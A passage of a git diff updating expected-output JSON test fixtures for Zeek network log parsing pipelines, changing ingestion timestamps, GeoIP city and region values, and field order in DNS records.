"{\"ts\":1617062640.941952,\"ts_delta\":900.0005369186401,\"peer\":\"zeek\",\"gaps\":58475,\"acks\":65665,\"percent_lost\":89.05048351481003}", "type": "info", "created": "2020-04-28T11:07:58.223Z", @@ -65,7 +65,7 @@ } }, "event": { - "ingested": "2021-12-09T13:50:56.071417300Z", + "ingested": "2021-12-14T14:59:07.224985934Z", "original": "{\"ts\":1617063540.942231,\"ts_delta\":900.0002789497376,\"peer\":\"zeek\",\"gaps\":54754,\"acks\":61818,\"percent_lost\":88.5729075673752}", "type": "info", "created": "2020-04-28T11:07:58.223Z", @@ -90,7 +90,7 @@ } }, "event": { - "ingested": "2021-12-09T13:50:56.071422800Z", + "ingested": "2021-12-14T14:59:07.224986315Z", "original": "{\"ts\":1617064440.942597,\"ts_delta\":900.0003659725189,\"peer\":\"zeek\",\"gaps\":51022,\"acks\":57974,\"percent_lost\":88.00841756649533}", "type": "info", "created": "2020-04-28T11:07:58.223Z", @@ -115,7 +115,7 @@ } }, "event": { - "ingested": "2021-12-09T13:50:56.071427300Z", + "ingested": "2021-12-14T14:59:07.224986695Z", "original": "{\"ts\":1617065340.942651,\"ts_delta\":900.0000541210175,\"peer\":\"zeek\",\"gaps\":55105,\"acks\":62497,\"percent_lost\":88.17223226714883}", "type": "info", "created": "2020-04-28T11:07:58.223Z", @@ -148,7 +148,7 @@ } }, "event": { - "ingested": "2021-12-09T13:50:56.071431100Z", + "ingested": "2021-12-14T14:59:07.224987082Z", "original": "{\"ts\":1568132368.465338,\"ts_delta\":32.282249,\"peer\":\"bro\",\"gaps\":0,\"acks\":206,\"percent_lost\":0.0}", "type": "info", "created": "2020-04-28T11:07:58.223Z", diff --git a/packages/zeek/data_stream/connection/_dev/test/pipeline/test-conn.log-expected.json b/packages/zeek/data_stream/connection/_dev/test/pipeline/test-conn.log-expected.json index 90dda5010a4..845b81d5f07 100644 --- a/packages/zeek/data_stream/connection/_dev/test/pipeline/test-conn.log-expected.json +++ b/packages/zeek/data_stream/connection/_dev/test/pipeline/test-conn.log-expected.json @@ -38,7 +38,7 @@ }, "event": { "duration": 76967000, - "ingested": "2021-12-09T13:50:56.388703500Z", + "ingested": "2021-12-14T14:59:07.719052684Z", "original": "{\"ts\":1547188415.857497,\"uid\":\"CAcJw21BbVedgFnYH3\",\"id.orig_h\":\"192.168.86.167\",\"id.orig_p\":38339,\"id.resp_h\":\"192.168.86.1\",\"id.resp_p\":53,\"proto\":\"udp\",\"service\":\"dns\",\"duration\":0.076967,\"orig_bytes\":75,\"resp_bytes\":178,\"conn_state\":\"SF\",\"local_orig\":true,\"local_resp\":true,\"missed_bytes\":0,\"history\":\"Dd\",\"orig_pkts\":1,\"orig_ip_bytes\":103,\"resp_pkts\":1,\"resp_ip_bytes\":206,\"tunnel_parents\":[]}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -78,14 +78,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -120,7 +120,7 @@ }, "event": { "duration": 76967000, - "ingested": "2021-12-09T13:50:56.388712400Z", + "ingested": "2021-12-14T14:59:07.719086167Z", "original": "{\"ts\":1547188416.857497,\"uid\":\"CAcJw21BbVedgFnYH4\",\"id.orig_h\":\"192.168.86.167\",\"id.orig_p\":38340,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":53,\"proto\":\"udp\",\"service\":\"dns\",\"duration\":0.076967,\"orig_bytes\":75,\"resp_bytes\":178,\"conn_state\":\"SF\",\"local_orig\":true,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"Dd\",\"orig_pkts\":1,\"orig_ip_bytes\":103,\"resp_pkts\":1,\"resp_ip_bytes\":206,\"tunnel_parents\":[]}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -159,14 +159,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -195,14 +195,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -219,7 +219,7 @@ }, "event": { "duration": 76967000, - "ingested": "2021-12-09T13:50:56.388718400Z", + "ingested": "2021-12-14T14:59:07.719086748Z", "original": "{\"ts\":1547188417.857497,\"uid\":\"CAcJw21BbVedgFnYH5\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":38334,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":53,\"proto\":\"udp\",\"service\":\"dns\",\"duration\":0.076967,\"orig_bytes\":75,\"resp_bytes\":178,\"conn_state\":\"SF\",\"local_orig\":false,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"Dd\",\"orig_pkts\":1,\"orig_ip_bytes\":103,\"resp_pkts\":1,\"resp_ip_bytes\":206,\"tunnel_parents\":[]}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -259,14 +259,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -301,7 +301,7 @@ "ip": "192.168.2.205" }, "event": { - "ingested": "2021-12-09T13:50:56.388724100Z", + "ingested": "2021-12-14T14:59:07.719087140Z", "original": "{\"ts\":1551399000.57855,\"uid\":\"Cc6NJ3GRlfjE44I3h\",\"id.orig_h\":\"192.168.2.205\",\"id.orig_p\":3,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":3,\"proto\":\"icmp\",\"conn_state\":\"OTH\",\"local_orig\":false,\"local_resp\":false,\"missed_bytes\":0,\"orig_pkts\":1,\"orig_ip_bytes\":107,\"resp_pkts\":0,\"resp_ip_bytes\":0,\"tunnel_parents\":[]}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -339,14 +339,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -380,7 +380,7 @@ "ip": "10.156.0.2" }, "event": { - "ingested": "2021-12-09T13:50:56.388729900Z", + "ingested": "2021-12-14T14:59:07.719087516Z", "original": "{\"ts\":1617062400.404645,\"uid\":\"CCicIg43lOtCQOxXnb\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":56190,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":443,\"proto\":\"tcp\",\"conn_state\":\"OTH\",\"local_orig\":true,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"C\",\"orig_pkts\":0,\"orig_ip_bytes\":0,\"resp_pkts\":0,\"resp_ip_bytes\":0}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -418,14 +418,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -460,7 +460,7 @@ }, "event": { "duration": 103708982, - "ingested": "2021-12-09T13:50:56.388735500Z", + "ingested": "2021-12-14T14:59:07.719087917Z", "original": "{\"ts\":1617062100.419397,\"uid\":\"C52mXBCPJ4pPGkhr1\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":60810,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":443,\"proto\":\"tcp\",\"duration\":0.10370898246765137,\"orig_bytes\":0,\"resp_bytes\":5854,\"conn_state\":\"SHR\",\"local_orig\":true,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"^hCcdafA\",\"orig_pkts\":1,\"orig_ip_bytes\":52,\"resp_pkts\":4,\"resp_ip_bytes\":267}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -498,14 +498,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -540,7 +540,7 @@ }, "event": { "duration": 104128838, - "ingested": "2021-12-09T13:50:56.388741200Z", + "ingested": "2021-12-14T14:59:07.719090564Z", "original": "{\"ts\":1617062100.419603,\"uid\":\"CTzCky2CyLT5JJvHck\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":60804,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":443,\"proto\":\"tcp\",\"duration\":0.10412883758544922,\"orig_bytes\":0,\"resp_bytes\":5854,\"conn_state\":\"SHR\",\"local_orig\":true,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"^hCcdafA\",\"orig_pkts\":1,\"orig_ip_bytes\":52,\"resp_pkts\":4,\"resp_ip_bytes\":267}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -578,14 +578,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -620,7 +620,7 @@ }, "event": { "duration": 104333878, - "ingested": "2021-12-09T13:50:56.388746800Z", + "ingested": "2021-12-14T14:59:07.719090943Z", "original": "{\"ts\":1617062100.419826,\"uid\":\"CIkS28PDxqQnN49m2\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":60802,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":443,\"proto\":\"tcp\",\"duration\":0.10433387756347656,\"orig_bytes\":0,\"resp_bytes\":5854,\"conn_state\":\"SHR\",\"local_orig\":true,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"^hCcdafA\",\"orig_pkts\":1,\"orig_ip_bytes\":52,\"resp_pkts\":4,\"resp_ip_bytes\":267}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -682,7 +682,7 @@ }, "event": { "duration": 26802063, - "ingested": "2021-12-09T13:50:56.388752500Z", + "ingested": "2021-12-14T14:59:07.719091294Z", "original": "{\"ts\":1617062390.563187,\"uid\":\"CezEGe4jeLNkayV976\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":38948,\"id.resp_h\":\"169.254.169.254\",\"id.resp_p\":53,\"proto\":\"udp\",\"service\":\"dns\",\"duration\":0.02680206298828125,\"orig_bytes\":0,\"resp_bytes\":241,\"conn_state\":\"SHR\",\"local_orig\":true,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"Cd\",\"orig_pkts\":0,\"orig_ip_bytes\":0,\"resp_pkts\":1,\"resp_ip_bytes\":269}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -745,7 +745,7 @@ }, "event": { "duration": 25056124, - "ingested": "2021-12-09T13:50:56.388758200Z", + "ingested": "2021-12-14T14:59:07.719091659Z", "original": "{\"ts\":1617062390.563442,\"uid\":\"CKSr3w18mmW6t7bXC4\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":40080,\"id.resp_h\":\"169.254.169.254\",\"id.resp_p\":53,\"proto\":\"udp\",\"service\":\"dns\",\"duration\":0.025056123733520509,\"orig_bytes\":0,\"resp_bytes\":276,\"conn_state\":\"SHR\",\"local_orig\":true,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"Cd\",\"orig_pkts\":0,\"orig_ip_bytes\":0,\"resp_pkts\":1,\"resp_ip_bytes\":304}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -808,7 +808,7 @@ }, "event": { "duration": 3319979, - "ingested": "2021-12-09T13:50:56.388762200Z", + "ingested": "2021-12-14T14:59:07.719092014Z", "original": "{\"ts\":1617062390.667048,\"uid\":\"CGUiHy4kLIF2ml95eg\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":41407,\"id.resp_h\":\"169.254.169.254\",\"id.resp_p\":53,\"proto\":\"udp\",\"service\":\"dns\",\"duration\":0.003319978713989258,\"orig_bytes\":0,\"resp_bytes\":133,\"conn_state\":\"SHR\",\"local_orig\":true,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"Cd\",\"orig_pkts\":0,\"orig_ip_bytes\":0,\"resp_pkts\":1,\"resp_ip_bytes\":161}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -871,7 +871,7 @@ }, "event": { "duration": 1111984, - "ingested": "2021-12-09T13:50:56.388767100Z", + "ingested": "2021-12-14T14:59:07.719092573Z", "original": "{\"ts\":1617062390.698943,\"uid\":\"CAOZZi4Qrio7gUVgVc\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":50487,\"id.resp_h\":\"169.254.169.254\",\"id.resp_p\":53,\"proto\":\"udp\",\"service\":\"dns\",\"duration\":0.0011119842529296876,\"orig_bytes\":0,\"resp_bytes\":202,\"conn_state\":\"SHR\",\"local_orig\":true,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"Cd\",\"orig_pkts\":0,\"orig_ip_bytes\":0,\"resp_pkts\":1,\"resp_ip_bytes\":230}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -934,7 +934,7 @@ }, "event": { "duration": 908852, - "ingested": "2021-12-09T13:50:56.388772200Z", + "ingested": "2021-12-14T14:59:07.719092936Z", "original": "{\"ts\":1617062390.699227,\"uid\":\"Chx5fs3xQ5ALB72i4e\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":49647,\"id.resp_h\":\"169.254.169.254\",\"id.resp_p\":53,\"proto\":\"udp\",\"service\":\"dns\",\"duration\":0.0009088516235351563,\"orig_bytes\":0,\"resp_bytes\":145,\"conn_state\":\"SHR\",\"local_orig\":true,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"Cd\",\"orig_pkts\":0,\"orig_ip_bytes\":0,\"resp_pkts\":1,\"resp_ip_bytes\":173}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -996,7 +996,7 @@ "ip": "10.156.0.2" }, "event": { - "ingested": "2021-12-09T13:50:56.388777Z", + "ingested": "2021-12-14T14:59:07.719093278Z", "original": "{\"ts\":1617062400.703865,\"uid\":\"C3pPjh1YRYcVDiZD3\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":44944,\"id.resp_h\":\"169.254.169.254\",\"id.resp_p\":80,\"proto\":\"tcp\",\"conn_state\":\"OTH\",\"local_orig\":true,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"C\",\"orig_pkts\":0,\"orig_ip_bytes\":0,\"resp_pkts\":0,\"resp_ip_bytes\":0}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -1057,7 +1057,7 @@ "ip": "10.156.0.2" }, "event": { - "ingested": "2021-12-09T13:50:56.388780800Z", + "ingested": "2021-12-14T14:59:07.719093624Z", "original": "{\"ts\":1617062400.703851,\"uid\":\"ChUxTmYLG37oO5qUb\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":44942,\"id.resp_h\":\"169.254.169.254\",\"id.resp_p\":80,\"proto\":\"tcp\",\"conn_state\":\"OTH\",\"local_orig\":true,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"C\",\"orig_pkts\":0,\"orig_ip_bytes\":0,\"resp_pkts\":0,\"resp_ip_bytes\":0}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -1118,7 +1118,7 @@ "ip": "10.156.0.2" }, "event": { - "ingested": "2021-12-09T13:50:56.388785300Z", + "ingested": "2021-12-14T14:59:07.719093964Z", "original": "{\"ts\":1617062400.704467,\"uid\":\"CpeAOT3B11CTXJgzw2\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":44946,\"id.resp_h\":\"169.254.169.254\",\"id.resp_p\":80,\"proto\":\"tcp\",\"conn_state\":\"OTH\",\"local_orig\":true,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"C\",\"orig_pkts\":0,\"orig_ip_bytes\":0,\"resp_pkts\":0,\"resp_ip_bytes\":0}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -1151,14 +1151,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -1187,14 +1187,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -1236,7 +1236,7 @@ }, "event": { "duration": 76967000, - "ingested": "2021-12-09T13:50:56.388791300Z", + "ingested": "2021-12-14T14:59:07.719094441Z", "original": "{\"ts\":1547188417.857497,\"uid\":\"CAcJw21BbVedgFnYH5\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":38334,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":53,\"proto\":\"udp\",\"service\":\"dns\",\"duration\":0.076967,\"orig_bytes\":75,\"resp_bytes\":178,\"conn_state\":\"SF\",\"local_orig\":false,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"Dd\",\"orig_pkts\":1,\"orig_ip_bytes\":103,\"resp_pkts\":1,\"resp_ip_bytes\":206,\"tunnel_parents\":[]}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -1286,7 +1286,7 @@ "ip": "10.0.2.15" }, "event": { - "ingested": "2021-12-09T13:50:56.388795400Z", + "ingested": "2021-12-14T14:59:07.719094822Z", "original": "{\"ts\":\"2021-06-09T20:55:13.160328Z\",\"uid\":\"C2KP1V3alRLoxl4JB9\",\"id.orig_h\":\"10.0.2.15\",\"id.orig_p\":46408,\"id.resp_h\":\"172.16.9.68\",\"id.resp_p\":80,\"proto\":\"tcp\",\"conn_state\":\"OTH\",\"local_orig\":true,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"C\",\"orig_pkts\":0,\"orig_ip_bytes\":0,\"resp_pkts\":0,\"resp_ip_bytes\":0}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/zeek/data_stream/dce_rpc/_dev/test/pipeline/test-dce-rpc.log-expected.json b/packages/zeek/data_stream/dce_rpc/_dev/test/pipeline/test-dce-rpc.log-expected.json index a8a9d8bf689..a7284a3366e 100644 --- a/packages/zeek/data_stream/dce_rpc/_dev/test/pipeline/test-dce-rpc.log-expected.json +++ b/packages/zeek/data_stream/dce_rpc/_dev/test/pipeline/test-dce-rpc.log-expected.json @@ -31,7 +31,7 @@ "ip": "172.16.133.6" }, "event": { - "ingested": "2021-12-09T13:50:58.323937300Z", + "ingested": "2021-12-14T14:59:09.769997634Z", "original": "{\"ts\":1361916332.298338,\"uid\":\"CsNHVHa1lzFtvJzT8\",\"id.orig_h\":\"172.16.133.6\",\"id.orig_p\":1728,\"id.resp_h\":\"172.16.128.202\",\"id.resp_p\":445,\"rtt\":0.09211,\"named_pipe\":\"\\u005cPIPE\\u005cbrowser\",\"endpoint\":\"browser\",\"operation\":\"BrowserrQueryOtherDomains\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -102,7 +102,7 @@ "name": "Lees-MBP.localdomain" }, "event": { - "ingested": "2021-12-09T13:50:58.323944800Z", + "ingested": "2021-12-14T14:59:09.770000842Z", "original": "{\"ts\":1361916332.298338,\"uid\":\"CsNHVHa1lzFtvJzT8\",\"id.orig_h\":\"172.16.133.6\",\"id.orig_p\":1728,\"id.resp_h\":\"172.16.128.202\",\"id.resp_p\":445,\"rtt\":0.09211,\"named_pipe\":\"\\u005cPIPE\\u005cbrowser\",\"endpoint\":\"browser\",\"operation\":\"BrowserrQueryOtherDomains\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/zeek/data_stream/dhcp/_dev/test/pipeline/test-dhcp.log-expected.json b/packages/zeek/data_stream/dhcp/_dev/test/pipeline/test-dhcp.log-expected.json index 8c7578663fc..4ae179d0cee 100644 --- a/packages/zeek/data_stream/dhcp/_dev/test/pipeline/test-dhcp.log-expected.json +++ b/packages/zeek/data_stream/dhcp/_dev/test/pipeline/test-dhcp.log-expected.json @@ -63,7 +63,7 @@ "address": "192.168.199.132" }, "event": { - "ingested": "2021-12-09T13:50:58.676860500Z", + "ingested": "2021-12-14T14:59:10.103460884Z", "original": "{\"ts\":1476605498.771847,\"uids\":[\"CmWOt6VWaNGqXYcH6\",\"CLObLo4YHn0u23Tp8a\"],\"client_addr\":\"192.168.199.132\",\"server_addr\":\"192.168.199.254\",\"mac\":\"00:0c:29:03:df:ad\",\"host_name\":\"DESKTOP-2AEFM7G\",\"client_fqdn\":\"DESKTOP-2AEFM7G\",\"domain\":\"localdomain\",\"requested_addr\":\"192.168.199.132\",\"assigned_addr\":\"192.168.199.132\",\"lease_time\":1800.0,\"msg_types\":[\"REQUEST\",\"ACK\"],\"duration\":0.000161}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -139,7 +139,7 @@ "address": "10.156.0.2" }, "event": { - "ingested": "2021-12-09T13:50:58.676864400Z", + "ingested": "2021-12-14T14:59:10.103463757Z", "original": "{\"ts\":1617088722.072416,\"uids\":[\"Ck0tsG4wsJxI3lIEZ\"],\"client_addr\":\"10.156.0.2\",\"server_addr\":\"169.254.169.254\",\"mac\":\"42:01:0a:9c:00:02\",\"domain\":\"c.elastic-sa.internal\",\"assigned_addr\":\"10.156.0.2\",\"lease_time\":86400.0,\"msg_types\":[\"ACK\"],\"duration\":0.0}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -227,7 +227,7 @@ "address": "192.168.199.132" }, "event": { - "ingested": "2021-12-09T13:50:58.676870800Z", + "ingested": "2021-12-14T14:59:10.103464232Z", "original": "{\"ts\":1476605498.771847,\"uids\":[\"CmWOt6VWaNGqXYcH6\",\"CLObLo4YHn0u23Tp8a\"],\"client_addr\":\"192.168.199.132\",\"server_addr\":\"192.168.199.254\",\"mac\":\"00:0c:29:03:df:ad\",\"host_name\":\"DESKTOP-2AEFM7G\",\"client_fqdn\":\"DESKTOP-2AEFM7G\",\"domain\":\"localdomain\",\"requested_addr\":\"192.168.199.132\",\"assigned_addr\":\"192.168.199.132\",\"lease_time\":1800.0,\"msg_types\":[\"REQUEST\",\"ACK\"],\"duration\":0.000161}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/zeek/data_stream/dnp3/_dev/test/pipeline/test-dnp3.log-expected.json b/packages/zeek/data_stream/dnp3/_dev/test/pipeline/test-dnp3.log-expected.json index d9c25a2dd6d..4a0ee24dad2 100644 --- a/packages/zeek/data_stream/dnp3/_dev/test/pipeline/test-dnp3.log-expected.json +++ b/packages/zeek/data_stream/dnp3/_dev/test/pipeline/test-dnp3.log-expected.json @@ -29,7 +29,7 @@ "ip": "127.0.0.1" }, "event": { - "ingested": "2021-12-09T13:50:59.129296Z", + "ingested": "2021-12-14T14:59:10.523928699Z", "original": "{\"ts\":1227729908.705944,\"uid\":\"CQV6tj1w1t4WzQpHoe\",\"id.orig_h\":\"127.0.0.1\",\"id.orig_p\":42942,\"id.resp_h\":\"127.0.0.1\",\"id.resp_p\":20000,\"fc_request\":\"READ\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -98,7 +98,7 @@ "name": "Lees-MBP.localdomain" }, "event": { - "ingested": "2021-12-09T13:50:59.129299400Z", + "ingested": "2021-12-14T14:59:10.523930746Z", "original": "{\"ts\":1227729908.705944,\"uid\":\"CQV6tj1w1t4WzQpHoe\",\"id.orig_h\":\"127.0.0.1\",\"id.orig_p\":42942,\"id.resp_h\":\"127.0.0.1\",\"id.resp_p\":20000,\"fc_request\":\"READ\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/zeek/data_stream/dns/_dev/test/pipeline/test-dns.log-expected.json b/packages/zeek/data_stream/dns/_dev/test/pipeline/test-dns.log-expected.json index 4f55d3cd81c..3beb189043d 100644 --- a/packages/zeek/data_stream/dns/_dev/test/pipeline/test-dns.log-expected.json +++ b/packages/zeek/data_stream/dns/_dev/test/pipeline/test-dns.log-expected.json @@ -1,6 +1,16 @@ { "expected": [ { + "@timestamp": "2019-01-11T06:33:35.857Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "192.168.86.167", + "192.168.86.1" + ] + }, "destination": { "port": 53, "address": "192.168.86.1", @@ -74,27 +84,9 @@ "address": "192.168.86.167", "ip": "192.168.86.167" }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "dns", - "community_id": "1:Z26DBGVYoBKQ1FT6qfPaAqBnJik=", - "transport": "udp" - }, - "@timestamp": "2019-01-11T06:33:35.857Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "192.168.86.167", - "192.168.86.1" - ] - }, "event": { "duration": 7.6967E7, - "ingested": "2021-12-09T13:50:59.483477600Z", + "ingested": "2021-12-14T14:59:10.859211565Z", "original": "{\"ts\":1547188415.857497,\"uid\":\"CAcJw21BbVedgFnYH3\",\"id.orig_h\":\"192.168.86.167\",\"id.orig_p\":38339,\"id.resp_h\":\"192.168.86.1\",\"id.resp_p\":53,\"proto\":\"udp\",\"trans_id\":15209,\"rtt\":0.076967,\"query\":\"dd625ffb4fc54735b281862aa1cd6cd4.us-west1.gcp.cloud.es.io\",\"qclass\":1,\"qclass_name\":\"C_INTERNET\",\"qtype\":1,\"qtype_name\":\"A\",\"rcode\":0,\"rcode_name\":\"NOERROR\",\"AA\":false,\"TC\":false,\"RD\":true,\"RA\":true,\"Z\":0,\"answers\":[\"proxy-production-us-west1.gcp.cloud.es.io\",\"proxy-production-us-west1-v1-009.gcp.cloud.es.io\",\"89.160.20.156\"],\"TTLs\":[119.0,119.0,59.0],\"rejected\":false}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -108,9 +100,27 @@ "info" ], "outcome": "success" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "dns", + "community_id": "1:Z26DBGVYoBKQ1FT6qfPaAqBnJik=", + "transport": "udp" } }, { + "@timestamp": "2019-08-29T16:23:50.680Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "fe80::4ef:15cf:769f:ff21", + "ff02::fb" + ] + }, "destination": { "port": 5353, "address": "ff02::fb", @@ -145,26 +155,8 @@ "address": "fe80::4ef:15cf:769f:ff21", "ip": "fe80::4ef:15cf:769f:ff21" }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "dns", - "community_id": "1:Jq0sRtlGSMjsvMBE1ZYybbR2tI0=", - "transport": "udp" - }, - "@timestamp": "2019-08-29T16:23:50.680Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "fe80::4ef:15cf:769f:ff21", - "ff02::fb" - ] - }, "event": { - "ingested": "2021-12-09T13:50:59.483485800Z", + "ingested": "2021-12-14T14:59:10.859214240Z", "original": "{\"ts\":1567095830.680046,\"uid\":\"C19a1k4lTv46YMbeOk\",\"id.orig_h\":\"fe80::4ef:15cf:769f:ff21\",\"id.orig_p\":5353,\"id.resp_h\":\"ff02::fb\",\"id.resp_p\":5353,\"proto\":\"udp\",\"trans_id\":0,\"query\":\"_googlecast._tcp.local\",\"qclass\":1,\"qclass_name\":\"C_INTERNET\",\"qtype\":12,\"qtype_name\":\"PTR\",\"AA\":false,\"TC\":false,\"RD\":false,\"RA\":false,\"Z\":0,\"rejected\":false}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -178,9 +170,27 @@ "info" ], "outcome": "success" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "dns", + "community_id": "1:Jq0sRtlGSMjsvMBE1ZYybbR2tI0=", + "transport": "udp" } }, { + "@timestamp": "2019-08-29T16:23:50.734Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "192.168.86.237", + "224.0.0.251" + ] + }, "destination": { "port": 5353, "address": "224.0.0.251", @@ -226,26 +236,8 @@ "address": "192.168.86.237", "ip": "192.168.86.237" }, - "tags": [ - "preserve_original_event" - ], - "network": { - 